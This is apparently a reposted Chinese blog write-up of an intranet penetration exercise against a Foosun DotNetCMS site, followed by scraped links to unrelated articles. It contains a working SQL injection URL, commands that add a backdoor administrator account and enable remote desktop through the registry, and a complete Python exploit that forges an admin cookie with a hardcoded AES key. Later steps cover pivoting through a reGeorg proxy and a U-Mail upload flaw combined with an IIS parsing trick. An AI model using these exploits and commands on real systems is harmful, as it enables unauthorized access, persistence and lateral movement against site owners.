记录一次【模仿真实环境】的内网漫游
一阶段、
信息收集:
通过NMAP进行端口扫描 发现网站开放了80,443,700,8080端口
80端口下存在web服务 :Foosun DotNetCMS 2.0 网站为IIS搭建的aspx站 服务器操作系统为win2008
8080端口下存在路由登录界面
二、web渗透、
浏览网站发现网站使用了FoosunCMS
寻找相关漏洞
www.text.com/user/City_ajax.aspx?CityId=1
处存在sql注入
http://192.168.31.55/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,U
serNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin
Table: fs_sys_admin
[1 entry]
+--------------+
| UserNum |
+--------------+
| 327142054961 |
+--------------+
这里只跑出来了一个uerrnumber没有我们想要的后台账号和密码
但是发现这个注入又写入权限
不过 并不知道绝对路径
然后我们利用--os-shell发现交互了一个shell并且是系统权限
开启3389 并建立一个用户成功了
并且我们获得权限的主机IP为192.168.1.123
网关为192.168.1.1
net user szg 123456 /add & net localgroup administrators szg /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
接下来我们利用网上爆出的漏洞利用该usernum生成一个cookie
脚本如下:
#coding:utf-8
import argparse
import urllib
import traceback
import base64
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
###############################
##search keyword: ##
##inurl:/manage/Login.aspx ##
###############################
KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
return parser.parse_args()
def run(url):
try:
usernumber = get_usernumber(url)
if usernumber is not None:
encrypt_cookie = generate_cookie(usernumber)
#写入cookie中
write_cookie(url, encrypt_cookie)
except Exception:
traceback.print_exc()
def get_usernumber(url):
fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
content = urllib.urlopen(fullurl).read()
index = content.index("<option value=\"")
if index != -1:
usernumber = content[index+15:]
usernumber = usernumber[0: content.index("\"")+1]
print "Get usernumber success. Usernumber is :", usernumber
return usernumber
else:
print "Get usernumber fail"
return None
def pkcs7padding(data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_text
def generate_cookie(usernumber):
orgstr = "%s,admin,0,1,False"%(usernumber,)
cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])
ciphertext = cryptor.encrypt(pkcs7padding(orgstr))
ciphertext = base64.b64encode(ciphertext)
return ciphertext
def write_cookie(url, ciphercookie):
print "Generate Cookie[SITEINFO]:", ciphercookie
print "Now you can write cookie and access the url: %s/manage/index.aspx"%(url,)
if __name__ == '__main__':
args = parse_args()
try:
if args.url is not None:
run(args.url[0])
except Exception, e:
print "python Foosun_exp.py -u [url]"
###这里python运行该脚本需要加载一个模块忘了叫啥了提示的时候百度一下那个名字然后 pip install
接下来利用谷歌浏览器的
EditThisCookie插件利用该cookie登陆后台
成功登陆到后台
上传一句话之后发现链接上了一句话显示200却没有回显
但是利用reGeorg挂了个代理成功了
这时候我们拿到了代理权限并且添加了管理员账户(这里具体请看我的另一篇文章https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html)
这时候就可以连接3389了
在远程连接的主机192.168.1.123中
翻到了管理员记录的密码
接下来利用获得的密码试着登陆8080端口一下发现限制了IP
利用代理继续登陆
挂代理之后成功登陆
三、内网漫游、
这里我们在路由中发现了另一个网段
如果没有进行Vlan的划分那么我们的192.168.1.123就可以ping通172.19.23.123
接下来扫描端口并访问172.19.23.123下的网站
利用之前3389连接远程珠桌面获得的密码进行登陆
同样利用u-mail的漏洞进行渗透
该漏洞的上传路径为http://172.19.23.123/webmail/client/cache/userid/重命名序号
http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk
构造上传页面调用上传接口
利用iis的解析漏洞+/1.php访问(????不是ngix解析漏洞吗?? 不 !IIS也可以)
http://172.19.23.123/webmail/client/cache/3/15598087978.jpg/1.php
转载于:https://www.cnblogs.com/xiaoyunxiaogang/p/10994590.html
记录一次【模仿真实环境】的内网漫游相关推荐
- 支付宝沙箱环境+SpringBoot+内网穿透整合开发
目录 1.查看沙箱账号 2.内网穿透 3.沙箱环境整合SpringBoot开发 下面我将以实际案例详细介绍如何使用沙箱环境进行支付宝支付对接的开发 1.查看沙箱账号 首先什么是沙箱账号? 沙箱账号是指 ...
- 百度地图部署流程(实际生产环境部署内网)
请以 root 账户运行(root用户拥有最高权限) 安装最低环境配置:Centos 6.5及以上,jdk1.8 ,gcc3.4.5以上,内存64G及以上,硬盘500G及以上,CPU 8核及以上 ce ...
- 【内网穿透服务器】公网环境访问内网服务器(以使用samba(smb)文件共享服务为例)
公网环境访问内网服务器,以使用samba(smb)文件共享服务为例 Frp 挂载 Frp SSH端口 访问 访问 samba Linux cifs Windows Winscp等客户端 SFTP协议登 ...
- 内网漫游(lateral movement)的破解之道
目录 什么是"内网漫游"(lateral movement)? 第1步:攻击用户 第2步:抓取本地管理员的密码哈希 第3步:找到已登录的域管理员 如何预防内网漫游攻击? 安装LAP ...
- 内网安全-域横向内网漫游Socks代理隧道技术
因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你 案例 1-内网穿透 Ngrok ...
- 内网安全学习(六)—域横向-内网漫游: Socks 代理
内网安全-域横向内网漫游 Socks 代理隧道技术 1.前置知识: 1)正向与反向连接: 正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我 ...
- 安全攻防 | 内网漫游之SOCKS代理总结
## 0x01引言 ## 在实际渗透过程中,我们成功入侵了目标服务器.接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口.内网网站8080端口等等 ...
- 【内网安全】域横向内网漫游Socks代理隧道技术
代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp.ngrok和ew等,ew(earthwo ...
- CFS 三层内网漫游安全测试演练
CFS 三层内网漫游安全测试演练 环境配置 演练 环境配置 靶场环境: 靶场虚拟机下载:https://pan.baidu.com/s/1O9pgm9UZCSIdifMEb0E9ZA#list/pat ...
最新文章
- php比较长的configure
- Android数据库专家秘籍(七)经验LitePal查询艺术
- 解决protobuf import路径的问题
- vue中使用transition标签底部导航闪烁问题
- android 内核态
- 硬件能力与智能AI-Zoomla!逐浪CMS2 x3.9.2正式发布
- SAP CRM One Order 根据联系人姓名搜索的实现原理
- c语言图案问题,C语言绘图问题
- mysql 计算差值_Prometheus + Granafa 构建MySQL监控平台
- adobe audition cs6 能打开mpcm文件吗?_单根32G内存靠谱吗?阿斯加特 W2 32G DDR4 2666内存测试...
- 腾讯-004-两个排序数组的中位数
- 常见的网页布局(HTML、CSS)
- 正在等待继续编辑 - Python - 基础知识专题 - 配置文件与日志管理
- MvcPager使用的Demo(同步分页)
- codeblocks 终端设置
- eclipse(window平台)快捷键总结
- 计算机丢失d3d10,“怎样解决d3dx10_42.dll丢失造成的游戏打不开”的解决方案
- 东野圭吾《沉默的巡游》简单书评(含剧透)
- kk5.0 服务器信息,关于KK问题整理汇总,这个可以收藏!
- 金融大数据架构概述与应用
热门文章
- Nignx平滑升级(1.8.0-1.8.1)
- ssm中使用hibernate-validator验证BO
- Oracle中加速索引创建或重建的方法
- 初识用.NET Remoting来开发分布式应用 (转载)
- vue中怎么清空tab选项卡的缓存_vue Tab切换以及缓存页面处理的几种方式
- Calendar日历简单用法
- 【AMAD】import-string -- 通过字符串来import一个对象
- Lattice diamond IPexpress 例子 - PLL
- lnmp 60秒的服务器缓存时间
- 解决git@osc每次提交需要输入用户名密码的问题